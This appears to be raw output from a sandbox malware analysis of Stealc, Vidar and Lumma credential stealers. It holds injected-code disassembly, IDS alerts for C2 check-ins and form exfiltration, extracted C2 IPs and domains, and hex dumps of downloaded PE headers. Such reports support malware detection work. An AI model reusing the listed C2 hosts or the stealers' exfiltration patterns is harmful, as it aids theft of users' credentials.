Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov edx, dword ptr [esp] 24_2_0040C69D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 24_2_00413846
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+00000874h] 24_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [edx], cx 24_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [edx], cx 24_2_0041F862
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov edi, dword ptr [edx+ebx+3Ch] 24_2_0043A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 24_2_004390C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ecx, dword ptr [esp] 24_2_0043E8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 24_2_0043E080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp eax 24_2_00413888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [edx], cx 24_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 24_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ecx, dword ptr [esp] 24_2_0041D940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 24_2_00431950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [ecx], al 24_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [ecx], al 24_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ecx, dword ptr [ebp-24h] 24_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx eax, word ptr [ebx] 24_2_0043F9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [ebx+esi*8], 625B6034h 24_2_004211B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 24_2_00413A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h] 24_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esi+34h] 24_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esi+34h] 24_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ecx, dword ptr [esi+18h] 24_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh 24_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 24_2_004122E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h 24_2_0043F290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [edi], al 24_2_00427B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [eax], cx 24_2_00423BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [ecx], ax 24_2_0041DBEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 24_2_0043E390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 24_2_0043D470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 24_2_0043DC70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 24_2_0041C400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov edx, dword ptr [ebp-10h] 24_2_0041E411
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 24_2_004104D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+38h] 24_2_0040F578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp edx 24_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp byte ptr [ebx+01h], 00000000h 24_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 24_2_00424640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [eax], cx 24_2_0041C660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 24_2_00415E62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h] 24_2_0042866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 24_2_00403E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+00000874h] 24_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [edx], cx 24_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [eax], cx 24_2_00423F07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 24_2_0043DF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp edx 24_2_0043A796

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49702 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.7:49702 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 46.8.231.109:80 -> 192.168.2.7:49702
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.7:49702 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 46.8.231.109:80 -> 192.168.2.7:49702
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.7:49702 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2055475 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop) : 192.168.2.7:56010 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.7:49712 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.7:49715 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.7:49731 -> 147.45.68.138:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.7:49731
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.7:49731
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.7:49735 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.7:49736 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.7:49737 -> 95.164.119.162:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.7:49741
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.7:49741
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49736 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49736 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49712 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49735 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49712 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49735 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49715 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49715 -> 172.67.146.35:443
Source: Malware configuration extractor URLs: http://46.8.231.109/c4754d4f680ead72.php
Source: Malware configuration extractor URLs: locatedblsoqp.shop
Source: Malware configuration extractor URLs: caffegclasiqwp.shop
Source: Malware configuration extractor URLs: traineiwnqo.shop
Source: Malware configuration extractor URLs: evoliutwoqm.shop
Source: Malware configuration extractor URLs: millyscroqwp.shop
Source: Malware configuration extractor URLs: stagedchheiqwo.shop
Source: Malware configuration extractor URLs: condedqpwqm.shop
Source: Malware configuration extractor URLs: stamppreewntnq.shop
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199761128941
Source: Malware configuration extractor URLs: https://t.me/jamelwt
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
